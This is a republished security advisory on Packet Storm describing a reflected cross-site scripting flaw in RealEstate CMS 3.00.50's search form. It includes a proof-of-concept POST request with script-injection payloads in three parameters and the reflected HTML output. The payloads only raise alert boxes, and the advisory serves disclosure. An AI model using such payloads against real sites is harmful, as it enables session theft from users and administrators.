what you don't know can hurt you

RealEstate CMS 3.00.50 Cross Site Scripting

RealEstate CMS 3.00.50 Cross Site Scripting
Posted Sep 23, 2016
Authored by ZwX | Site vulnerability-lab.com

RealEstate CMS version 3.00.50 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 717f015a08ee776ae3582394c50e3ce4

RealEstate CMS 3.00.50 Cross Site Scripting

Change Mirror Download
i>>?Document Title:
===============
RealEstate CMS 3.00.50 - Cross Site Web Vulnerability


Release Date:
=============
2016-09-08


Vulnerability Disclosure Timeline:
==================================
2016-09-23 : Public Disclosure


Product & Service Introduction:
===============================
RealEstate CMS is a web portal script designed for realty agents , realtor or brokers to sell , buy , trade , rent and letting their client's property through online. It is a web based Content Management System integrated web application platform developed in php, mysql used by real estate companies to promote properties. Feature-rich, SEO-friendly, easy to use interface with Protected admin area to create.

(Copy of the Vendor Homepage: http://www.script4realestate.com/ )


Affected Product(s):
====================
Product: Realestate v3.00.50 - Content Management System


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-
A client-side cross site scripting web vulnerability has been discovered in the official Realestate v3.00.50 content management system.
The vulnerability allows remote attacker to inject own malicious script codes on the client-side of the vulnerable module or service.

A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allow an attacker
to execute javascript in the web-browser of the user or administrator to compromise session credentials. The attacker can connect
to a third account to trigger the issue without knowing the password.


Request Method(s):
[+] POST


Vulnerable Module(s):
[+] Add (Input)


Vulnerable Parameter(s):
[+] property_name
[+] post_code
[+] property_price


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST] ---
Status: 200 [OK]
Host: realestate.localhost:8000/
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://realestate.localhost:8000/
Cookie: PHPSESSID=8897722dac6adcebc9a966069e91ea83; __unam=6aaa37b-1570a42f57e-507aafb3-2; __utma=261436815.141070340.1473345943.1473345943.1473345943.1; __utmb=261436815.2.10.1473345943; __utmc=261436815; __utmz=261436815.1473345943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 529
block_search=search&property_name='"/>></script><script>alert("vulnerabilitylab")</script>&post_code='"/>></script><script>alert("vulnerabilitylab")</script>&category_id_arr%5B%5D=any&property_type=any&property_price='"/>></script><script>alert("vulnerabilitylab")</script>&property_price-gte=any&property_price-lte=any&feature_room_no-gte=any&feature_bathroom-gte=any&country_id=227&state_id=any&area_id=any&property_owner=any


--- PoC: Source ---
<div class="form-group">
<label>Post Code:</label>
<input type="text" name="post_code" id="post_code" placeholder="Any" value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control">
<input type="hidden" name="block_search" value="search" />
</div>
<div class="form-group">
<input name="property_name" id="property_name" operator="contains" type="text" placeholder="Property Name"
value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control"/>
</div>
<script type="text/javascript">
//<!--
{field: "property_price", operator: $("#property_price").attr('operator'), value: ""'"/>></script><script>alert("vulnerabilitylab")</script>"},
//-->
</script>

Reference(s):
http://realestate.localhost:8000/


[+] Disclaimer [+]
===================
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


Domain: www.zwx.fr
Contact: msk4@live.fr
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
0day.today/author/27461


Copyright A(c) 2016 | ZwX - Security Researcher (Software & web application)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    10 Files
  • 23
    Apr 23rd
    22 Files
  • 24
    Apr 24th
    4 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close